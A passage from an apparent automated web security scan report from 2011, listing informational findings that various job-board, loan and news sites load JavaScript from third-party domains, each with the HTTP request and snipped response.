Host:   https://www.lawschoolloans.com
Path:   /lslprivateloan_application.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29907

<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="https://www.lawschoolloans.com/script/overlibmws_scroll.js"></scr
...[SNIP]...
<span id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=1700332279059004dc41012009ff0cfd57e8594241035641441859611"></script>
...[SNIP]...

15.377. http://www.legalauthority.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
Set-Cookie: LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 130129

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Legal Resume Consultant, Legal Job Search, Sample Attorney Resume, Legal S
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1"></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.378. http://www.legalauthority.com/signup.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://srvr19.pdcsrvr.com/vsa/callagent.php?cid=1"></script>
...[SNIP]...

15.379. http://www.logisticscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.380. http://www.managercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.381. http://www.manufacturingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.382. http://www.marketingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.383. http://www.mediajobcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.384. http://www.medicalschoolloans.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalschoolloans.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...
<!-- Google Analytics Code for Non-Secure(HTTP) Pages Starts here -->
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
<!-- Powered by: Crafty Syntax Live Help http://www.craftysyntax.com/ -->
           <script type="text/javascript" title="MSL Live Chat" src="http://128.121.234.97/livechat/livehelp_js.php?department=3&amp;pingtimes=15"></script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=189&cid=4204&bid=350&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...

15.385. http://www.militarycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.386. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /id/41161439/ns/politics-more_politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41161439/ns/politics-more_politics/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 84830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.msn.com/j/MSNBC/Components/Photo/_new/g-pol-110119-Obama-poll-144p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

15.387. http://www.nursingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.388. http://www.occupationaltherapycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
